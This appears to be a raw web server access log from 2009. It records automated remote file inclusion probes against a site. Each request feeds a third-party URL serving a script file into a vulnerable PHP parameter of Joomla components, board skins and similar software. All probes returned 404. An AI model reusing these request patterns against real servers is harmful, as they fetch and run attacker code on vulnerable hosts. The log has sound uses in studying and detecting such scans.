123.213.63.137 - - [21/Sep/2009:14:19:47 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
123.213.63.137 - - [21/Sep/2009:14:19:47 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
123.213.63.137 - - [21/Sep/2009:14:19:50 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
123.213.63.137 - - [21/Sep/2009:14:19:50 -0700] "GET /logs/access.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
123.213.63.137 - - [21/Sep/2009:14:19:51 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "galf.org"
123.213.63.137 - - [21/Sep/2009:14:19:51 -0700] "GET /logs/access.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
123.213.63.137 - - [21/Sep/2009:14:19:51 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "galf.org"
123.213.63.137 - - [21/Sep/2009:14:19:51 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
212.193.10.130 - - [21/Sep/2009:14:23:24 -0700] "GET /logs/access.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
212.193.10.130 - - [21/Sep/2009:14:23:24 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
212.193.10.130 - - [21/Sep/2009:14:23:24 -0700] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.204.148.251 - - [21/Sep/2009:14:24:15 -0700] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.204.148.251 - - [21/Sep/2009:14:24:15 -0700] "GET /logs/access.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
212.193.10.130 - - [21/Sep/2009:14:25:13 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.193.10.130 - - [21/Sep/2009:14:25:14 -0700] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
212.193.10.130 - - [21/Sep/2009:14:25:16 -0700] "GET /logs/access_090420.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.204.148.251 - - [21/Sep/2009:14:27:05 -0700] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.43.194.3 - - [21/Sep/2009:14:27:39 -0700] "GET /inc/header.php/step_one.php?server_inc=http://soxs.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
208.43.194.3 - - [21/Sep/2009:14:27:39 -0700] "GET /logs/access_090629.log%20//inc/header.php/step_one.php?server_inc=http://soxs.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
208.43.194.3 - - [21/Sep/2009:14:27:39 -0700] "GET /logs//inc/header.php/step_one.php?server_inc=http://soxs.interfree.it/bovsp.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
221.143.40.39 - - [21/Sep/2009:14:28:03 -0700] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "galf.org"
221.143.40.39 - - [21/Sep/2009:14:28:03 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "galf.org"
221.143.40.39 - - [21/Sep/2009:14:28:03 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "galf.org"
221.143.40.39 - - [21/Sep/2009:14:28:06 -0700] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "galf.org"
221.143.40.39 - - [21/Sep/2009:14:28:06 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "galf.org"
221.143.40.39 - - [21/Sep/2009:14:28:06 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "galf.org"
221.143.40.39 - - [21/Sep/2009:14:28:30 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
221.143.40.39 - - [21/Sep/2009:14:28:31 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
221.143.40.39 - - [21/Sep/2009:14:28:31 -0700] "GET /logs/access_090817.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
221.143.40.39 - - [21/Sep/2009:14:28:31 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
221.143.40.39 - - [21/Sep/2009:14:28:31 -0700] "GET /logs/access_090817.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
221.143.40.39 - - [21/Sep/2009:14:28:31 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
221.143.40.39 - - [21/Sep/2009:14:29:10 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "galf.org"
221.143.40.39 - - [21/Sep/2009:14:29:10 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "galf.org"
221.143.40.39 - - [21/Sep/2009:14:29:14 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "galf.org"
221.143.40.39 - - [21/Sep/2009:14:29:14 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "galf.org"
221.143.40.39 - - [21/Sep/2009:14:29:14 -0700] "GET /logs/access.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://cyb3r0s.fileave.com/id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "galf.org"
212.193.10.130 - - [21/Sep/2009:14:31:31 -0700] "GET /logs/access.log%20%20//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
123.213.63.137 - - [21/Sep/2009:14:31:55 -0700] "GET /logs/access_090817.log////skin/ggambo7001_board/comment_modify.php?dir=http://www.mmbeauty.idv.tw//catalog/spread.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
123.213.63.137 - - [21/Sep/2009:14:31:55 -0700] "GET ///skin/ggambo7001_board/comment_modify.php?dir=http://www.mmbeauty.idv.tw//catalog/spread.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
123.213.63.137 - - [21/Sep/2009:14:31:55 -0700] "GET /logs////skin/ggambo7001_board/comment_modify.php?dir=http://www.mmbeauty.idv.tw//catalog/spread.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
212.193.10.130 - - [21/Sep/2009:14:32:26 -0700] "GET /logs/access_090420.log%20%20//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
71.18.216.39 - - [21/Sep/2009:14:33:10 -0700] "GET /logs//viewbody.html?code=http://www.colverculvergenealogy.org/genealogy//bash/yes.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
71.18.216.39 - - [21/Sep/2009:14:33:10 -0700] "GET /viewbody.html?code=http://www.colverculvergenealogy.org/genealogy//bash/yes.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
71.18.216.39 - - [21/Sep/2009:14:33:10 -0700] "GET /logs/access_090824.log//viewbody.html?code=http://www.colverculvergenealogy.org/genealogy//bash/yes.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
71.18.216.39 - - [21/Sep/2009:14:33:16 -0700] "GET /logs/access.log//viewbody.html?code=http://www.colverculvergenealogy.org/genealogy//bash/yes.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
193.231.187.33 - - [21/Sep/2009:14:34:27 -0700] "GET /admin.php?include_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
193.231.187.33 - - [21/Sep/2009:14:34:28 -0700] "GET /logs/admin.php?include_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
193.231.187.33 - - [21/Sep/2009:14:34:28 -0700] "GET /logs/access_090420.log%20/admin.php?include_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
193.231.187.33 - - [21/Sep/2009:14:34:28 -0700] "GET /logs/access.log%20/admin.php?include_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
211.204.148.251 - - [21/Sep/2009:14:45:13 -0700] "GET /logs/access_090427.log%20%20//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
200.101.70.1 - - [21/Sep/2009:14:45:51 -0700] "GET /logs/access_090629.log%20%20//main.php?pageURL=http://www.freewebtown.com/ppkkssss/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
200.101.70.1 - - [21/Sep/2009:14:45:51 -0700] "GET /main.php?pageURL=http://www.freewebtown.com/ppkkssss/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
200.101.70.1 - - [21/Sep/2009:14:45:51 -0700] "GET /logs//main.php?pageURL=http://www.freewebtown.com/ppkkssss/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
200.101.70.1 - - [21/Sep/2009:14:46:06 -0700] "GET /logs/access_090316.log%20%20//main.php?pageURL=http://www.freewebtown.com/ppkkssss/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.17.99.13 - - [21/Sep/2009:14:49:29 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.17.99.13 - - [21/Sep/2009:14:49:30 -0700] "GET /logs/access_090525.log%20%20//modules/agendax/addevent.inc.php?agendax_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.17.99.13 - - [21/Sep/2009:14:49:30 -0700] "GET /modules/agendax/addevent.inc.php?agendax_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.17.99.13 - - [21/Sep/2009:14:49:37 -0700] "GET /modules/agendax/addevent.inc.php?agendax_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.17.99.13 - - [21/Sep/2009:14:49:37 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.17.99.13 - - [21/Sep/2009:14:49:37 -0700] "GET /logs/access_090525.log%20%20//modules/agendax/addevent.inc.php?agendax_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.17.99.13 - - [21/Sep/2009:14:49:50 -0700] "GET /logs/access_090511.log%20%20//modules/agendax/addevent.inc.php?agendax_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.17.99.13 - - [21/Sep/2009:14:49:56 -0700] "GET /logs/access_090511.log%20%20//modules/agendax/addevent.inc.php?agendax_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.17.99.13 - - [21/Sep/2009:14:50:07 -0700] "GET /logs/access_090824.log%20%20//modules/agendax/addevent.inc.php?agendax_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.17.99.13 - - [21/Sep/2009:14:50:07 -0700] "GET /logs/access_090706.log%20%20//modules/agendax/addevent.inc.php?agendax_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.17.99.13 - - [21/Sep/2009:14:50:08 -0700] "GET /logs/access_090316.log%20%20//modules/agendax/addevent.inc.php?agendax_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.17.99.13 - - [21/Sep/2009:14:50:10 -0700] "GET /logs/access_090824.log%20%20//modules/agendax/addevent.inc.php?agendax_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.17.99.13 - - [21/Sep/2009:14:50:11 -0700] "GET /logs/access_090706.log%20%20//modules/agendax/addevent.inc.php?agendax_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.17.99.13 - - [21/Sep/2009:14:50:16 -0700] "GET /logs/access_090316.log%20%20//modules/agendax/addevent.inc.php?agendax_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.17.99.13 - - [21/Sep/2009:14:50:33 -0700] "GET /logs/access_090518.log%20%20//modules/agendax/addevent.inc.php?agendax_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.17.99.13 - - [21/Sep/2009:14:50:34 -0700] "GET /logs/access_090427.log%20%20//modules/agendax/addevent.inc.php?agendax_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.17.99.13 - - [21/Sep/2009:14:50:36 -0700] "GET /logs/access_090518.log%20%20//modules/agendax/addevent.inc.php?agendax_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
216.17.99.13 - - [21/Sep/2009:14:50:36 -0700] "GET /logs/access_090427.log%20%20//modules/agendax/addevent.inc.php?agendax_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [21/Sep/2009:14:52:55 -0700] "GET /modules/agendax/addevent.inc.php?agendax_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [21/Sep/2009:14:52:55 -0700] "GET /logs/access_090525.log%20%20//modules/agendax/addevent.inc.php?agendax_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [21/Sep/2009:14:52:58 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [21/Sep/2009:14:53:29 -0700] "GET /logs/access_090511.log%20%20//modules/agendax/addevent.inc.php?agendax_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
77.222.40.169 - - [21/Sep/2009:14:53:44 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
77.222.40.169 - - [21/Sep/2009:14:53:46 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
77.222.40.169 - - [21/Sep/2009:14:53:47 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [21/Sep/2009:14:53:59 -0700] "GET /logs/access_090706.log%20%20//modules/agendax/addevent.inc.php?agendax_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [21/Sep/2009:14:53:59 -0700] "GET /logs/access_090824.log%20%20//modules/agendax/addevent.inc.php?agendax_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [21/Sep/2009:14:54:09 -0700] "GET /logs/access_090316.log%20%20//modules/agendax/addevent.inc.php?agendax_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.231.187.33 - - [21/Sep/2009:14:54:31 -0700] "GET /logs/access.log/includes/todofleetcontrol.php?ugamela_root_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "galf.org"
193.231.187.33 - - [21/Sep/2009:14:54:54 -0700] "GET /logs/includes/todofleetcontrol.php?ugamela_root_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "galf.org"
193.231.187.33 - - [21/Sep/2009:14:54:54 -0700] "GET /includes/todofleetcontrol.php?ugamela_root_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "galf.org"
58.184.252.3 - - [21/Sep/2009:14:54:57 -0700] "GET /logs/access_090518.log%20%20//modules/agendax/addevent.inc.php?agendax_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [21/Sep/2009:14:55:09 -0700] "GET /logs/access_090427.log%20%20//modules/agendax/addevent.inc.php?agendax_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
77.222.40.169 - - [21/Sep/2009:14:56:32 -0700] "GET /logs/access.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
77.222.40.169 - - [21/Sep/2009:14:56:42 -0700] "GET /logs/access.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
92.52.216.123 - - [21/Sep/2009:14:58:13 -0700] "GET /bbs//skin/ggambo7002_board/comment_modify.php?dir=http://bizadmin.hongik.ac.kr/bbs/data/__zbSessionTMP/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
92.52.216.123 - - [21/Sep/2009:14:58:13 -0700] "GET /logs//bbs//skin/ggambo7002_board/comment_modify.php?dir=http://bizadmin.hongik.ac.kr/bbs/data/__zbSessionTMP/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
92.52.216.123 - - [21/Sep/2009:14:58:13 -0700] "GET /logs/access_090817.log%20%20//bbs//skin/ggambo7002_board/comment_modify.php?dir=http://bizadmin.hongik.ac.kr/bbs/data/__zbSessionTMP/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [21/Sep/2009:14:58:57 -0700] "GET /logs/ashnews.php?pathtoashnews=http://sports.wisegiga.net/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [21/Sep/2009:14:58:57 -0700] "GET /ashnews.php?pathtoashnews=http://sports.wisegiga.net/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [21/Sep/2009:14:58:57 -0700] "GET /logs/access_090518.log%20%20/ashnews.php?pathtoashnews=http://sports.wisegiga.net/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [21/Sep/2009:14:59:17 -0700] "GET /logs/access_090622.log%20%20/ashnews.php?pathtoashnews=http://sports.wisegiga.net/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
92.52.216.123 - - [21/Sep/2009:14:59:48 -0700] "GET /logs/access_090817.log%20%20//bbs//skin/ggambo7002_board/comment_modify.php?dir=http://bizadmin.hongik.ac.kr/bbs/data/__zbSessionTMP/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
92.52.216.123 - - [21/Sep/2009:14:59:51 -0700] "GET /bbs//skin/ggambo7002_board/comment_modify.php?dir=http://bizadmin.hongik.ac.kr/bbs/data/__zbSessionTMP/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
92.52.216.123 - - [21/Sep/2009:14:59:53 -0700] "GET /logs//bbs//skin/ggambo7002_board/comment_modify.php?dir=http://bizadmin.hongik.ac.kr/bbs/data/__zbSessionTMP/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
83.16.135.210 - - [21/Sep/2009:15:00:21 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.tuwebtv.es/cache/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
121.130.29.11 - - [21/Sep/2009:15:00:36 -0700] "GET /logs//mes-stats//bbs//skin/zero_vote/ask_password.php?dir=http://www.rucoc.com/rucoc1.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.130.29.11 - - [21/Sep/2009:15:00:36 -0700] "GET /mes-stats//bbs//skin/zero_vote/ask_password.php?dir=http://www.rucoc.com/rucoc1.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.130.29.11 - - [21/Sep/2009:15:00:36 -0700] "GET /logs/access_090406.log//mes-stats//bbs//skin/zero_vote/ask_password.php?dir=http://www.rucoc.com/rucoc1.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.130.29.11 - - [21/Sep/2009:15:00:36 -0700] "GET /logs/access_090504.log//mes-stats//bbs//skin/zero_vote/ask_password.php?dir=http://www.rucoc.com/rucoc1.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
92.52.216.123 - - [21/Sep/2009:15:01:17 -0700] "GET /logs//bbs//skin/ggambo7002_board/comment_modify.php?dir=http://bizadmin.hongik.ac.kr/bbs/data/__zbSessionTMP/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
92.52.216.123 - - [21/Sep/2009:15:01:18 -0700] "GET /logs/access_090817.log%20%20//bbs//skin/ggambo7002_board/comment_modify.php?dir=http://bizadmin.hongik.ac.kr/bbs/data/__zbSessionTMP/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
92.52.216.123 - - [21/Sep/2009:15:01:25 -0700] "GET /bbs//skin/ggambo7002_board/comment_modify.php?dir=http://bizadmin.hongik.ac.kr/bbs/data/__zbSessionTMP/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
92.52.216.123 - - [21/Sep/2009:15:01:25 -0700] "GET /logs//bbs//skin/ggambo7002_board/comment_modify.php?dir=http://bizadmin.hongik.ac.kr/bbs/data/__zbSessionTMP/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
92.52.216.123 - - [21/Sep/2009:15:01:25 -0700] "GET /logs/access_090817.log%20%20//bbs//skin/ggambo7002_board/comment_modify.php?dir=http://bizadmin.hongik.ac.kr/bbs/data/__zbSessionTMP/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.173.25.215 - - [21/Sep/2009:15:02:54 -0700] "GET /logs/access_090420.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.173.25.215 - - [21/Sep/2009:15:02:54 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
217.173.25.215 - - [21/Sep/2009:15:02:57 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
83.16.135.210 - - [21/Sep/2009:15:03:00 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.tuwebtv.es/cache/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
